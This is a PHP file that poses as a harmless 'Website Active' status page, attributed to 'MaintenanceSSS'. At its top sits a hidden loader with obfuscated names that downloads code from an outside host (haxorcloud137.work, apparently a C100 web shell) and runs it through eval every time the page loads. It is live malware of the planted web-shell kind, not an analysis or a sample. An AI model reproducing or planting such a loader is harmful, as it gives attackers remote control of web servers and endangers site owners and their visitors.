<?php
/* iYrwI5k{CgX6#QGQ@j5
 * 5RJ5iNb^yY53]+J_XIL */
function gxqzChRFroC($u){
    if(function_exists('curl_init')){
        $ch=curl_init($u);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        yield curl_exec($ch);
        return;
    }
    yield @file_get_contents($u) ?: '';
}
$frvzvs='https://haxorcloud137.work/B.S/C-/universal-mentah/C100';

foreach(gxqzChRFroC($frvzvs) as $jywlcj){
    eval('?>'.$jywlcj);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welcome</title>
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body {
            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            min-height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
            padding: 20px;
        }
        .container {
            background: white;
            padding: 60px 40px;
            border-radius: 20px;
            box-shadow: 0 20px 60px rgba(0,0,0,0.3);
            text-align: center;
            max-width: 500px;
            width: 100%;
        }
        h1 {
            color: #333;
            font-size: 2.5em;
            margin-bottom: 20px;
            font-weight: 700;
        }
        p {
            color: #666;
            font-size: 1.1em;
            line-height: 1.6;
            margin-bottom: 30px;
        }
        .status {
            display: inline-block;
            background: #10b981;
            color: white;
            padding: 10px 30px;
            border-radius: 50px;
            font-weight: 600;
            font-size: 0.9em;
            letter-spacing: 1px;
        }
        .footer {
            margin-top: 30px;
            font-size: 0.85em;
            color: #999;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>🚀 Website Active</h1>
        <p>This website is currently up and running.</p>
        <div class="status">✓ ONLINE</div>
        <div class="footer">
            Powered by MaintenanceSSS
        </div>
    </div>
</body>
</html>